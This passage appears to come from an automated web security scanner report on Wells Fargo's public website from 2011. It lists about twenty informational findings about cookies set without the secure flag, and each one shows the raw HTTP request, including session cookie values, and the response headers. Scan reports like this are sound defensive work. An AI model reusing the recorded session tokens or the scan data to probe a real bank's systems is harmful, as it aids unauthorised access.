<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service -
...[SNIP]...

6.127. https://www.wellsfargo.com/insurance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /insurance/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insurance/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:54 GMT
Content-length: 8678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Insurance
...[SNIP]...

6.128. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /insurance/id_credit_protection/idtheft

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insurance/id_credit_protection/idtheft HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Identity Theft Protection - Id
...[SNIP]...

6.129. https://www.wellsfargo.com/investing/hsa/enroll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/hsa/enroll

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /investing/hsa/enroll HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 9955
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Health Savings Acc
...[SNIP]...

6.130. https://www.wellsfargo.com/investing/investmentservices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/investmentservices/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /investing/investmentservices/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 8732
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Investment Services</tit
...[SNIP]...

6.131. https://www.wellsfargo.com/investing/more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/more

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /investing/more HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:51 GMT
Content-length: 12093
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Investing</t
...[SNIP]...

6.132. https://www.wellsfargo.com/investing/mutual_funds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/mutual_funds/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /investing/mutual_funds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 12036
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Mutual Fund Center
...[SNIP]...

6.133. https://www.wellsfargo.com/investing/retirement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/retirement/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /investing/retirement/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 9837
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Retirement Accounts, P
...[SNIP]...

6.134. https://www.wellsfargo.com/investing/retirement/openira/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /investing/retirement/openira/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /investing/retirement/openira/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Open an IRA (Individual Retire
...[SNIP]...

6.135. https://www.wellsfargo.com/jump/about/fdic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/about/fdic

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/about/fdic HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:08 GMT
Content-length: 9678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.136. https://www.wellsfargo.com/jump/applications/inprogress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/applications/inprogress

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/applications/inprogress HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:07 GMT
Content-length: 4747
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.137. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/EFS/WAC1

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/wachovia/EFS/WAC1 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:05 GMT
Content-length: 6663
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.138. https://www.wellsfargo.com/jump/wachovia/insurance/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/insurance/identity

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/wachovia/insurance/identity HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:06 GMT
Content-length: 6816
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.139. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/mortgage/firsttimebuyer

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:04 GMT
Content-length: 5035
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=DwMVNJhQNzWpcNmrc2WYz9Rr7yXFhLPn21Q7n9DDVSqvxMx8Q9mT!-427629300; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWEWACP5; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:04 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.140. https://www.wellsfargo.com/locator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /locator HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Location: https://www.wellsfargo.com/locator/
Set-Cookie: ISD_WCM_COOKIE=2079611658.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/locator
...[SNIP]...

6.141. https://www.wellsfargo.com/locator/atm/preSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/preSearch

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /locator/atm/preSearch HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-type: text/html
Cache-Control: no-cache="Set-Cookie"
Location: https://www.wellsfargo.com/locator/atm/search
Set-Cookie: wcmcookieloc=NGyJNJhfZkJQBpWrs3zCZbWZdbfpMmq2j01SwVrYQ028TBgjR5nW!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/locator
...[SNIP]...

6.142. https://www.wellsfargo.com/locator/atm/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /locator/atm/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:17 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookieloc=mdg4NJhdq2DWYbbpdNp9BF000vJcqLG9gHCnvKSjFpn4l8Jr1tl9!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">


<head>

<title>Wells Fargo Locations<
...[SNIP]...

6.143. https://www.wellsfargo.com/mortgage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:41 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Mortgage Information .
...[SNIP]...

6.144. https://www.wellsfargo.com/mortgage/rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/rates

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:43 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - To
...[SNIP]...

6.145. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /online_brokerage/education/trading/volatile/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online_brokerage/education/trading/volatile/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:01 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/
Connection: close


<IMPORTBEAN BEAN="/wellsfargo/www/onlinebrokerage/education/TradingCatalog">
<head>
<title>Wells Fargo Online Brokerage</title>

<script language="JavaScript" type="text/javascript">


       document.w
...[SNIP]...

6.146. https://www.wellsfargo.com/per/more/banking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /per/more/banking

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /per/more/banking HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
